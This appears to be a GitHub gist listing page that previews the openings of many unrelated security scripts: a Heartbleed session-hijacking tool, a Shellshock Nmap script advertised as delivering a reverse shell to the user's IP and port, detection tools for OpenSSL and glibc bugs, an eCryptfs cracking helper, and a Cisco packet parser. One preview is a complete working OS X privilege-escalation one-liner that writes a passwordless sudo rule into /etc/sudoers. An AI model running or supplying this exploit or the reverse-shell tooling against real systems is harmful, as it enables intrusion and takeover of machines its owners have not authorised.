This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions. | |
# Michael Davis (mike.philip.davis@gmail.com) | |
# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
# The author disclaims copyright to this source code. | |
# https://www.michael-p-davis.com/using-heartbleed-for-hijacking-user-sessions/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$sesshash{'ip'} = '68.227.245.145'; | |
$sesshash{'user'} = 'admin'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl -w | |
use CGI; | |
use Digest::MD5 qw(md5_hex); | |
$cgi = new CGI; | |
$SESSDIR = "/tmp/"; | |
$sessfile = $cgi->cookie("diagsess"); | |
$arg0 = $cgi->param("arg"); | |
$action = $cgi->param("action"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local http = require "http" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local vulns = require "vulns" | |
description = [[ | |
NSE script that delivers you a reverse shell using CVE-2014-6271. | |
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse | |
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status | |
<ip> -d |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python | |
import sys | |
import socket | |
import time | |
import struct | |
if len(sys.argv)<2: | |
print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0]) | |
quit() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<title>PHP Source Analyzer by Delicon</title> | |
<head> | |
<script language="JavaScript"> | |
function mouseDown_Action(c_id) { | |
var obj = document.getElementById(c_id); | |
if (obj.style.visibility == 'hidden') { | |
obj.style.visibility = 'visible'; | |
obj.style.position = 'static'; | |
} else { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <netdb.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <errno.h> | |
#include <gnu/libc-version.h> | |
#define CANARY "in_the_coal_mine" | |
struct { | |
char buffer[1024]; | |
char canary[sizeof(CANARY)]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# It should work for OS X 10.10-10.10.4 | |
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Helper script for cracking eCryptfs. | |
# | |
# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt. | |
# | |
# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and | |
# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com> | |
# and it is hereby released to the general public under the following terms: | |
# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
#Author: Michal Garcarz @ cisco.com | |
#Date: 15.01.2013 | |
use Net::Frame::Simple; | |
use Net::Frame::Dump::Offline; | |
use Net::Frame::Layer::TCP; | |
use Net::Frame::Layer; | |
use Net::Frame::Layer::IPv4; |
OlderNewer